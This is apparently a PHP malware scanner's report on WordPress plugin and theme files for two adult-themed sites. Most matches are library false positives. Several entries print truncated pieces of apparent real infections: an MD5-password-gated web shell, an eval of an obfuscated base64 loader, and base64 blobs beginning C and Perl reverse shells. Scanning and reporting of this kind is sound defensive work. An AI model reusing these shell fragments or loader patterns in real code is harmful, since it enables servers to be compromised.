| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-03-20 21:27:16 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
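Exploit extract_global Line: 12 Dangerous Code injection: extracting a global variable array allows remote attackers to inject PHP code on the target machine via an HTTP request. `extract($_POST)` lets the request define or overwrite variables in the calling scope; reading the expected keys explicitly, or at least passing `EXTR_SKIP`, avoids that. |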
extract($_POST)
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-09-13 20:56:45 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-09-13 20:56:46 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-09-13 20:56:46 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-09-13 20:57:19 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-09-13 20:57:13 Modified: 2020-07-24 20:07:21 Warns: 3
| Description | Match |
|---|
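Exploit too_many_chr Line: 1071 Warning Concatenating many `chr()` calls is a technique usually used to obfuscate malicious code. The values matched on lines 1071-1073 run in plain ascending order (0-7, 10-17, 20-27), which looks like a character table rather than an encoded string; confirm against a clean copy of the library. |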
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-09-13 20:55:02 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-09-13 20:56:39 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-09-13 20:56:39 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/pern/data/www/intim-perm.club/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 18:25:10 Modified: 2020-09-27 18:25:23 Warns: 1 Dangers: 1
| Description | Match |
|---|
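Exploit password_protection_md5 Line: 9 Warning File gated by an MD5 password check, a pattern typically seen in web shells. The hard-coded hash on this line is the same one reported for the script_smartwall files under intim-saratov.ru, so any credential change or removal has to cover every copy. |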
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/pern/data/www/intim-perm.club/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 18:25:10 Modified: 2020-09-27 18:25:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/pern/data/www/intim-perm.club/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 18:25:10 Modified: 2020-09-27 18:25:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-10-02 13:54:28 Modified: 2021-10-02 13:54:28 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-10-02 13:54:28 Modified: 2021-10-02 13:54:28 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/script_smartwall/update.php Size: 9.06 kB Created: 2021-07-08 10:41:01 Modified: 2021-07-08 13:43:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, as typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/script_smartwall/index.php Size: 38.45 kB Created: 2021-07-08 10:41:01 Modified: 2021-07-08 13:43:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning File protected by an MD5 password check, as typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-07-08 10:41:01 Modified: 2021-07-08 13:43:57 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intimdosugsex/data/www/themes/sborka_BAD/scripts/slick/fonts/index.php Size: 8.55 kB Created: 2021-06-08 05:54:00 Modified: 2021-06-08 05:54:00 Warns: 2
| Description | Match |
|---|
Exploit infected_comment Line: 112 Warning Comments composed of 5 random characters are usually used to detect whether a file is already infected |
/*index*/
| Exploit infected_comment Line: 90 Warning Comments composed of 5 random characters are usually used to detect whether a file is already infected |
/*horse*/
|
|
//var/www/intimdosugsex/data/www/themes/sketch/404.php Size: 79.30 kB Created: 2021-06-06 00:59:52 Modified: 2021-06-06 00:59:52 Warns: 10 Dangers: 49
| Description | Match |
|---|
Exploit base64_long Line: 1576 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2F...
| Exploit base64_long Line: 1577 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3R...
| Exploit base64_long Line: 1578 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
